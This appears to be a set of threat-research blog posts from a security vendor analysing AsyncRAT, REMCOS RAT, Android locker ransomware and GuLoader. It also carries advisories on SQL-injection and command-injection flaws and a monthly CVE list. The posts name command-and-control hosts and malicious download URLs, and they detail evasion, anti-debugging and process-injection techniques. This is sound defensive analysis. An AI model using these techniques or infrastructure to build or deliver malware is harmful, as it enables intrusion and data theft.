Posts

Known Trojan named AsyncRAT is now going fileless

Writing a complete new malware code is always harder than tweaking, an already written and perfectly working code. Threat actors are using already written malware codes, either by buying it from the dark web or getting an open source code, available on various forum like GitHub or Pastebin. The threat actors are now more focused on delivery mechanism and infection chain, by keeping a low profile and very less exposure of malicious code to traditional security providers. However security software which investigate in memory are able to spot the actual malicious behavior. SonicWall Real Time Deep Memory Inspection (RTDMI) has detected a VBScript inside an archive which executes a web hosted PowerShell script to deliver and execute fileless AsyncRAT on the victim’s machine. The source code of AsyncRAT is publicly available on GitHub.

VBScript

The VBScript is obfuscated which involves multiple string reverse and concatenate operations. The VBScript gets the Windows Scripting Host shell object using CLSID “F935DC22-1CF0-11D0-ADB9-00C04FD58A0B” to further execute PowerShell script from an Unified Resource Locator (URL):

 

Instead of “.ps1” extension, the PowerShell script hosted URL contains “.txt” extension which makes the URL less suspicious. The malware does not save the PowerShell script onto the files system, it rather executes the PowerShell script in memory:

PowerShell Script

The malware infection chain starts from the VBScript, involves PowerShell scripts, task scheduler, DLL loader, batch file to read PowerShell cmdlet and finally executes the AsyncRAT on the victim’s machine:

 

The web hosted PowerShell script is highly obfuscated which creates malware directory “C:\ProgramData\HVLWIQDYCCPXWPCLXUYGXB” to save intermediate files, used in the infection chain. The malware uses 3 seconds sleep between various tasks execution:

 

Intermediate files saved in the malware directory:

  • HVLWIQDYCCPXWPCLXUYGXB.ps1 (First stage PowerShell script)
  • HVLWIQDYCCPXWPCLXUYGXB.vbs (Obfuscated VBScript)
  • HVLWIQDYCCPXWPCLXUYGXB.bat (Batch file contains cmdlet)
  • STVEVBEQXPLHZJQTHEIGGV.ps1 (Final stage PowerShell script)

The web hosted PowerShell script continues the infection chain by executing first stage PowerShell script which schedules a task to run the VBScript from malware directory every 3 minutes:

 

The highly obfuscated VBScript gets WIN32_Process object using Windows Management Instrumentation (WMI) to spawns a PowerShell process which reads the cmdlet from the batch file and executes the final stage PowerShell script:

 

The final stage PowerShell script contains two encoded binaries, DLL loader and AsyncRAT. The malware executes the DLL loader passing AsyncRAT binary bytes array and path to “C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe” as arguments. The DLL loader then loads and executes the AsyncRAT in the context of “jsc.exe“:

 

AsyncRAT

The AsyncRAT is very well known advance malware and its source code is publicly available on the GitHub. The threat actor has obfuscated the names of the functions, disabled some of the features and customized the code a little as per his requirements:

The malware initializes the configuration components and creates mutex “AsyncMutex_6SI8OkPnk” to guarantee single instance execution at a time. The malware contains code to check virtual environment, make persistence entry and get privilege access, however the code is disabled in this variant using the flag value.

 

C&C Communication

The malware connects to its Command and Control (C&C) server “rock.dynip.org” at port number 222:

 

The malware sends below information from the victim’s machine to the C&C server:

  • Packet type
  • Hardware ID
  • Username
  • Operating System info
  • Execution path
  • Version
  • Execution mode (Admin | User)
  • Active GUI window name
  • Antivirus
  • Executable time
  • Group

 

The malware receives below commands from the C&C server:

  • ping
  • pong
  • plugin
  • savePlugin

 

ping

The malware receives ping command from the C&C server which means no action is needed:

pong

The malware has registered a timer which keeps increasing the interval value. Once the malware receives pong command, the interval value is sent to the C&C server by setting the packet type to “pong”.

plugin

The malware receives the plugin command along with the plugin hash value. The malware checks if the plugin is already installed on the victim’s machine by looking the hash value into registry “HKEY_CURRENT_USER\Software“. If the plugin is already installed on the victim’s machine, the malware executes the plugin in memory else the malware sends the plugin hash value by setting the packet type to “sendPlugin“:

 

savePlugin

The malware receives the “savePlugin” command along with the compressed plugin bytes and its hash value. The malware saves the compressed plugin bytes into the registry entry “HKEY_CURRENT_USER\Software\6D8AD34F424F899EC2B0” with value name to hash of the plugin. The plugin bytes are decompressed and invoked by the malware:

 

The C&C server sends to 2 plugins to the victim’s machine:

Plugin 1

Name: Miscellaneous

SHA256: c3f842cc2228aff03f109bd7e13cc233e2ac7a383b35fdae9171c80af6def354

Plugin 2

Name: RemoteDesktop

SHA256: 470e625ab097155fe562394a450f3830d7725d8032f00dd3fb16243a7cf62930

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs indicates its uniqueness and limited distribution:

 

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Malicious Embedded Office File inside PDF is delivering REMCOS RAT

SonicWall Capture Labs Threat Research team has observed a malicious PDF file, comes as an e-mail attachment, detected by SonicWall RTDMI ™ engine which is delivering REMCOS RAT as the final payload.


Infection Cycle:

The PDF file has a malicious embedded doc file, which is dropped and executed from %temp% folder. PDF file has an OpenAction tag, set to a javascript which is embedded in PDF. On opening the PDF file the script is executed. Embedded DOC file name is “has been verified. However PDF, SVG, xlsx, .docx”.

Java Script inside PDF, which drops and executes DOC file

The DOC file has a reference to an external URL, which is a RTF file. It loads the RTF file from “hxxps://shortener[.]vc/fSpur”, whose final redirected URL is “hxxp://45[.]85[.]190[.]156/receipt/290.doc”. This RTF file has a CVE-2017-11882 exploit, which further downloads an .Net executable at “C:\Users\Public\vbc.exe” and executes it.

External Frame Object Link in webSettings.xml.rels

The .Net executable ‘vbc.exe’ makes a copy of itself in %APPDATA% as ‘doc.exe’, and creates RUN registry entry for it as ‘wix’. And then executes doc.exe.

The .Net executable file has a compressed .Net DLL file in its ‘AppPropsLib.Documents.resources’ resource object named as ‘_22’. It decompresses the resource and loads the obfuscated DLL(internal name of the DLL is Periodicity.dll) in the memory and calls its second export, and passes it three string arguments “5374617469634172726179496E69745479706553697A65”, “7157624F” and “AppPropsLib”. First argument is “StaticArrayInitTypeSize” (passed in hex format) name of another Bitmap object present in the doc.exe resource, second argument is the decryption key “qWbO” (passed in hex format) and third argument is the resource name in doc.exe.

Then Periodicity.dll loads the bitmap resource present in doc.exe and extracts ARGB values for all the pixels in an array. It then gets the encrypted data size from the first pixel ARGB value and copies the encrypted data into another array, then starts decrypting it using the key passed as an argument and the last byte of the encrypted data array.

Loading ARGB value of pixels in an array

Decrypting using the key passed in the argument

The decrypted data is yet another .Net highly obfuscated DLL file whose internal name is Thookinieng.dll. The .Net DLL has encrypted resources, one of which is  REMCOS RAT. Its decrypted data has some interesting string :

Strings Used to check Sandbox or VM

Powershell command to add ExclusionPath for Defender

REMCOS keeps the configuration information in the resource named as settings. The very first byte tells us the RC4 key size, followed by RC4 key which is further followed by the encrypted configuration information:

The version of REMCOS Rat payload is ‘v3.4.0 Pro’ .It reads the key from the resource and decrypts configuration data using RC4 algorithm which contains Command and Control (C&C) server’s IP address, port number, password, REMCOS executable’s name and key logging filename etc.:

 

Malicious PDF hashes:

  • f33170bbdf2c134c5de88cd931f850db16c093a9a26694040f889cea2c485cec
  • 677011006f557a3c25befb217086f099708077c6d27e091e16be15f619fa9547
  • 1f8a033bf8d5ab6d08b618980565c7f633985c154f5b8f6086f48b3d8304f906
  • baa63cbb933cd6b69e18a9db664b95eb03902deb49767d94ab5b23322aeed650
  • 3c29a03355bf0daea04e1c9f14523f71b88d839a3aab4ef52326f5632973d747
  • d762702d22cbd585c26f778dd47cbb6807679f7a5b7e7b8eedb63676db0bcf71

The file is detected by few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

Evidence of detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Android ransomware purports to be a free social media follower application

Sonicwall Capture Labs Threat Research team has observed many Android locker ransomware which asks to communicate using social media platforms. There is no assurance of getting the key even after paying the ransom amount, they just use these apps for monetary gain. Some of the applications look like free social media follower apps but are ransomware as shown below.

 

Figure 1: Ransomware App Icons

 

All these malicious apps are recently submitted over malware sharing platforms like Virus Total.

 

Figure 2: VirusTotal submission history

 

Infection Cycle:

Major permissions used in these apps are mentioned below:

  • SYSTEM_ALERT_WINDOW
  • RECEIVE_BOOT_COMPLETED
  • SET_WALLPAPER
  • READ_EXTERNAL_STORAGE
  • WRITE_EXTERNAL_STORAGE
  • READ_CONTACTS
  • READ_SMS
  • ACCESS_FINE_LOCATION
  • WAKE_LOCK
  • INTERNET
  • REQUEST_INSTALL_PACKAGE
  • CAMERA

Permission “SYSTEM_ALERT_WINDOW“  is used to display overlay windows above all activity windows in order to show ransom notes.

After installation app is not visible on the app drawer, to view installed app information we need to go into settings->Apps

 

Figure 3: Malicious app visible under settings

 

In the manifest file, “android.intent.category.LAUNCHER” is not set in MainActivity as shown below, which means that this application does not have a desktop startup icon.

 

Figure 4: Main activity launcher missing

 

Malicious application launches after “ACTION_BOOT_COMPLETED” system event which is fired once the Android system has completed the boot process, sets a lock screen with a ransom note and the user is not able to access the device.

 

Figure 5: Ransom note

 

On further investigation of malicious code, each malicious file has a different ransom note and different keys which are present in code itself under “password” field. No actual encryption of any file present on the device takes place except by locking the screen.

 

Figure 6: Password and Ransom note present in code

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

11a11a11a266f9d3858d1b52aca73b701406cbc587bf52a5256c20452d574d0a

193c8bc1f44cf310e670c0a4a9e19f9ad35afaac63eb549f9cc8dafa240555af

2cd6920661eec231b66ac3601ca380ba846490c8f535b903d3844326084ac490

2da6a8f85888d39c3a45b6d6367492e67243e985ef8bc4dc441fd66ffcbe3d9c

ac70993fb26bd4590d3656a4b6ba1e0787a9c524ed5ed5592663a6d8c05c32a1

ec38798940dbab431f3dacab74267b143e206ed8e3fc406be90125825198576a

Microsoft Security Bulletin Coverage for July 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-22034 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 340:Malformed-File exe.MP_261

CVE-2022-22047 Windows CSRSS Elevation of Privilege
ASY 339:Malformed-File exe.MP_260

CVE-2022-30202 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
ASPY 341:Malformed-File exe.MP_262

CVE-2022-30216 Windows Server Service Tampering Vulnerability
ASPY 334:Malformed-File exe.MP_258

CVE-2022-30220 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 335:Malformed-File exe.MP_259

Adobe Coverage:
CVE-2022-34215 Acrobat Reader Out-of-bounds Read Vulnerability
ASPY 336:Malformed-File pdf.MP_554

CVE-2022-34222 Acrobat Reader Out-of-bounds Read Vulnerability
ASPY 337:Malformed-File pdf.MP_555

CVE-2022-34227 Acrobat Reader Use After Free Vulnerability
ASPY 338:Malformed-File pdf.MP_556

The following vulnerabilities do not have exploits in the wild :
CVE-2022-21845 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22022 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22023 Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-22024 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22025 Windows Internet Information Services Cachuri Module Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-22026 Windows CSRSS Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-22027 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22028 Windows Network File System Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22029 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22031 Windows Credential Guard Domain-joined Public Key Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22036 Performance Counters for Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22037 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22038 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22039 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22040 Internet Information Services Dynamic Compression Module Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-22041 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22042 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22043 Windows Fast FAT File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22045 Windows.Devices.Picker.dll Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22048 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-22049 Windows CSRSS Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-22050 Windows Fax Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22711 Windows BitLocker Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-23816 AMD CPU Branch Type Confusion
There are no known exploits in the wild.
CVE-2022-23825 AMD CPU Branch Type Confusion
There are no known exploits in the wild.
CVE-2022-27776 Insufficiently protected credentials vulnerability might leak authentication or cookie header data
There are no known exploits in the wild.
CVE-2022-30181 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30187 Azure Storage Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30203 Windows Boot Manager Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-30205 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30206 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30208 Windows Security Account Manager (SAM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30209 Windows IIS Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30211 Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30212 Windows Connected Devices Platform Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30213 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30214 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30215 Active Directory Federation Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30221 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30222 Windows Shell Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30223 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30224 Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30225 Windows Media Player Network Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30226 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33632 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-33633 Skype for Business and Lync Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33637 Microsoft Defender for Endpoint Tampering Vulnerability
There are no known exploits in the wild.
CVE-2022-33640 Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33641 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33642 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33643 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33644 Xbox Live Save Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33650 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33651 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33652 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33653 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33654 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33655 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33656 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33657 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33658 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33659 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33660 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33661 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33662 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33663 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33664 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33665 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33666 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33667 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33668 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33669 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33671 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33672 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33673 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33674 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33675 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33676 Azure Site Recovery Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33677 Azure Site Recovery Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-33678 Azure Site Recovery Remote Code Execution Vulnerability
There are no known exploits in the wild.

Advantech iView SQL Injection Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Advantech iView is a Simple Network Management Protocol-based element management software provided free-of-charge with intelligent FTTx, Optical Access, Media Conversion and eWorx Smart Industrial Ethernet Switch solutions. iView features an intuitive Graphical User Interface that provides a real-life representation of all installed B+B SmartWorx equipment, enables network managers to control and monitor device functions, port settings, receive device status information and traffic statistics via SNMP. iView supports multiple platforms; iView is a Web-based application that runs on 32-bit/64-bit Windows using Microsoft Edge/IE, Google Chrome or Mozilla Firefox browsers.

  A SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the ID parameter in the updateSegmentInfo process.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-2135.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 6.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C).

  Base score is 7.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is low.
    • Impact of this vulnerability on data availability is low.
  Temporal score is 6.4 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  When a user sends a HTTP GET/POST request to the Request-URI “/iView3/NetworkServlet”, the function NetworkServlet.doPost() is called. The function NetworkServlet.doPost() first checks the value of the parameter page_action_type and compares it to multiple values. Each value corresponds to a different action to be performed by the server. The value of importance in this vulnerability is “updateSegmentInfo”. If the value of the parameter page_action_type is equal to “updateSegmentInfo”, the function NetworkServlet.updateSegmentInfo() is called.

  The function NetworkServlet.updateSegmentInfo() is used to update the name of created network segments. The value of the parameter data is stored in the variable strJSONObj and is passed to the function DeviceTreeTable.saveSegmentInfo().

  The function DeviceTreeTable.saveSegmentInfo() is used to prepare the UPDATE SQL query. The string strJSONObj is then converted into a JSON array and stored into the variable arrayJSON. The value of the JSON key DESC is then checked for SQL injection characters. If no such characters exist, the following SQL query is prepared then run on the database:

  The vulnerability exists as the value of the JSON key ID is never checked for SQL injection characters. If an attacker sends a request similar to the following:

  which the data parameter decodes to:

  which would cause the following SQL query to be executed:

  This query would cause the MySQL server to sleep for 30 seconds.
  *Note, that this same action is performed when a user accesses the Request-URI “/iView3/CommandServle

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network access to the target server.

Triggering Conditions:

  The vulnerability is triggered when the HTTP request is processed and the SQL query is executed.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2982 Advantech iView SQL Injection 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following patch to address this vulnerability:
  Vendor Advisory

Zyxel USG FLEX Command Injection Vulnerability

The Zyxel USG FLEX Series supports IPsec, SSL, and L2TP-based VPNs, making it an ideal solution for providing a secure network to access remote or home-based workers. Zero-configuration remote access removes complicated setup challenges making it easier for employees to establish VPN connections to the office without the need for IT support.

An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.

OS Command Injection

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization

Zyxel USG FLEX Command Injection | CVE-2022-30525
An attacker can inject remote commands on the vulnerable Zyxel devices by sending a malicious command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page. This will result in unauthenticated remote command execution as the nobody user.

By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an attacker can gain remote command execution as the nobody user.

Following are the affected versions

  • USG FLEX 100(W), 200, 500, 700 ZLD V5.00 through ZLD V5.21
  • USG FLEX 50(W) / USG20(W)-VPN ZLD V5.10 through ZLD V5.21

Zyxel has patched this vulnerability.

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 15761:Zyxel USG FLEX 100W Command Injection

Threat Graph

GuLoader: A fileless shellcode based malware in action

A good thief steals without leaving any footprint behind, the similar job is done by file less malware in the threat world.  Additionally if a file less malware getting the work done without involving Potable Executable (PE) file, not even in the memory is like ‘icing on the cake’. GuLoader is a file less shellcode based malware, recently observed by SonicWall threat research team.  A VBS script inside an archive file is delivered to the victim’s machine as an email attachment which loads GuLoader shellcode into PowerShell executable. GuLoader further downloads and executes other malware in the  memory of a legitimate process:

Infection Cycle:

VBSCRIPT

The obfuscated VBScript contains code broken into variables which is concatenated on execution. The VBScript stores the shellcode into registry entry HKEY_CURRENT_USER\Software\Fordyred6 which varies across the variants. A PowerShell script is then executed to read the registry value and continue the infection process:

PowerShell Script

The PowerShell script allocates memory into powershell.exe using API ZwAllocateVirtualMemory and reads the shellcode data from the registry entry. The shellcode is copied into allocated memory using RtlMoveMemory and executed inside powershell.exe:

Shellcode

An error window saying “This program cannot be run under virtual environment or debugging software!” can be seen on execution of the shellcode in a controlled environment. While analyzing the shellcode, a malware researcher should be habitual of seeing this window again and again, because the shellcode is full of anti debug and anti VM techniques:

 

Initial 0x41 bytes of the shellcode works as decryptor bytes for the remaining shellcode. The decryption is done using a XOR operation with a constant value:

 

After decrypting the remaining shellcode, the decryptor code ( initial 0x41 bytes) are replaced with 0x90 (NOP instruction) and control is transferred to the decrypted shellcode:

 

The shellcode uses PEB traversal method to get the API addresses by comparing API names with its own list of hashes. The malware uses custom DJB2 hashing algorithm to avoid detection from various security software. If custom DJB2 algorithm is not used, DJB2 hashes of the various APIs would be same across the malware variants which makes the detection pretty easy for the security software:

 

 

The malware involves various anti debug and anti VM techniques. It keeps all the strings encrypted which are decrypted and used on demand basis. It encrypts the code before calling the API and decrypts it back after calling the API.

Strings Decryption

The malware keeps the string encrypted which are being decrypted just before using them. The malware keeps a DWORD value before encrypted string, which is XOR with a constant value to get the string size. The malware contains a decryption key of size 0x2B bytes which is used to decrypt the encrypted strings using XOR operation:

Anti API Hook

The malware traverses the ntdll.dll memory starting from the code section and looks for bytes [0xb8, 0x00, ??, ??, 0xBA] to get the code responsible for making the system calls. These system calls are hooked by many security software to change the control flow to the their code for investigating the API calls. If the system calls code is patched, the malware restores them back to the original bytes:

Anti Dump

The malware encrypts the shellcode just before calling any API, to prevent event based memory dumps or analysis. After the API is called shellcode is decrypted back:

 

Anti Debug

 

Software Breakpoints

The malware checks for software breakpoints before calling the API by comparing initial bytes of the API with 0xCC (INT3) and initial word with 0x03CD (INT 3) and 0x0B0F (UD2). If any of these breakpoint instructions is found, the malware shows the error window message mentioned in the beginning and terminates the execution:

 

Vectored Exception Handler

The malware registers vectored exception handler with malware defined callback module which checks for INT3 (0xCC) exception and computes the next Extended Instruction Pointer (EIP) address by XOR the next byte of current EIP, to continue after the exception. The INT3 instruction is handled by the debugger which misleads the control flow to incorrect execution path:

 

However adding this vectored exception handler is an anti debugging technique, moreover in this malware this can be named as irritating technique for a researchers, because the code is full of INT3 instructions along with opaque predicate and arithmetic calculations. The researcher needs to either bypass the instruction by calculating the next EIP which will make him tired, or he needs to write a plugin code to bypass the instruction, which is again time consuming:

 

KUSER_SHARED_DATA

Similar to user mode GetTickCount API, kernel mode ZwGetTickCount reads values from the KUSER_SHARED_DATA page. This page is mapped read-only into the user mode at address 0x7FFE0000. The malware reads the values directly from KUSER_SHARED_DATA before and after executing some instructions and calculates the difference. The difference is calculated multiple times and added to a variable which is compared to the threshold value to check for debugging environment. If the computed value does not meet the threshold condition it will continue the execution in a infinite loop:

 

DbgBreakPoint

The malware modified the memory protection to ntdll.dll to  PAGE_EXECUTE_READWRITE  using ZwProtectVirtualMemory API and replaces INT3 instruction with NOP instruction inside DbgBreakPoint API to disallow attaching debugger:

 

DbgUiRemoteBreakin

The malware replaces code inside DbgUiRemoteBreakin to invoke ExitProcess API with exit code 0:

 

ThreadHideFromDebugger

The malware invokes ZwSetInformationThread API by setting ThreadInformationClass argument as ThreadHideFromDebugger which detaches the debugger and terminates the process immediately, if running under a debugger:

 

Anti VM

The malware gets the virtual memory using API ZwQueryVirtualMemory and searches for string “vmtoolsdControlWndClass” and if finds the string, the malware considers the execution in controlled environment. If malware finds any evidence of running under virtual environment, it shows the error message window and terminates the execution:

 

CPUID

The malware executes the CPUID instruction with EAX = 1 (to get processor features) as input and examines result value in ECX register. If the 31st bit is of the ECX register is set, the malware considers the execution inside the Virtual Machine (VM):

QEMU Emulator

The malware checks for the presence of files related to QEMU emulator:

  • C:\Program Files\Qemu-ga\qemu-ga.exe
  • C:\Program Files\qga\qga.exe

Enumerate Windows

The malware enumerates windows using EnumWindows API and checks the windows count, if count is less then 0xC then the malware considers the execution in controlled environment:

 

Enumerate Device Drivers

The malware retrieves load addresses of the device drivers using API EnumDeviceDrivers and gets the name associates with each load address using API  GetDeviceDriverBaseNameA . The malware computes custom DJB2 hash value of device driver names and compares them with its list of hashes:

  • D82B79F9
  • 72FCC347
  • 55C69E11 (vmmouse.sys)
  • 6538B8EE (vmusbmouse.sys)
  • 907D9998
  • 83277DEB (vm3dmp.sys)

 

Enumerate Installed Software

The malware enumerates installed products using MsiEnumProductsA API and retrieves the product name using API MsiGetProductInfoA. The malware computes custom DJB2 hash value of product names and compares them with its list of hashes:

  • 30565F59
  • E5AB7D36
  • 4F3EA1F6
  • 27D195CB

 

Enumerate Services

The malware opens specified service control manager database using API OpenSCManagerA and retrieves the service names using API EnumServicesStatusA. The malware computes custom DJB2 hash value of service names and compares them with its list of hashes:

  • C99647C9
  • ACBC4B26 (VMware Tools)
  • F1D665FC (VMware Snapshot Provider)
  • 82D0D13B
  • 1605A96C
  • CE8609AB
  • 9D86D771

 

Debug Port

The malware invokes API ZwQueryInformationProcess with parameters ProcessInformationClass as ProcessDebugPort. If the API call succeeded, the malware considers the execution under the debugger:

 

Code Injection

The malware creates process “C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe” in CREATE_SUSPENDED mode. The malware creates a section and tries to map the section into the suspended process at 0x400000 but it failed with 0x40000003 (STATUS_IMAGE_NOT_AT_BASE). The malware allocates virtual memory into the suspended process using API ZwAllocateVirtualMemory.

 

The malware writes the shellcode bytes (0x8D000) into the suspended process using API ZwWriteVirtualMemory:

 

The malware modifies the EIP of the suspended process from its entrypoint to the injected shellcode using API ZwSetContextThread:

 

The malware resumes the suspended process using API ZwResumeThread. The shellcode again starts from the beginning but in the context of a new process. The shellcode again executes all the anti debug and anti VM techniques but this time additionally it also downloads the payload data:

 

The malware downloads encrypted payload from URL h[t][t]ps://onedrive.live.com/download?cid=5E3278A18A104B1A&resid=5E3278A18A104B1A%21117&authkey=ABLIkl0zjTxzpTk by setting user agent as “Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko”. The malware downloads in a loop, 0x10000 bytes each time using InternetReadFile until the complete payload data is downloaded:

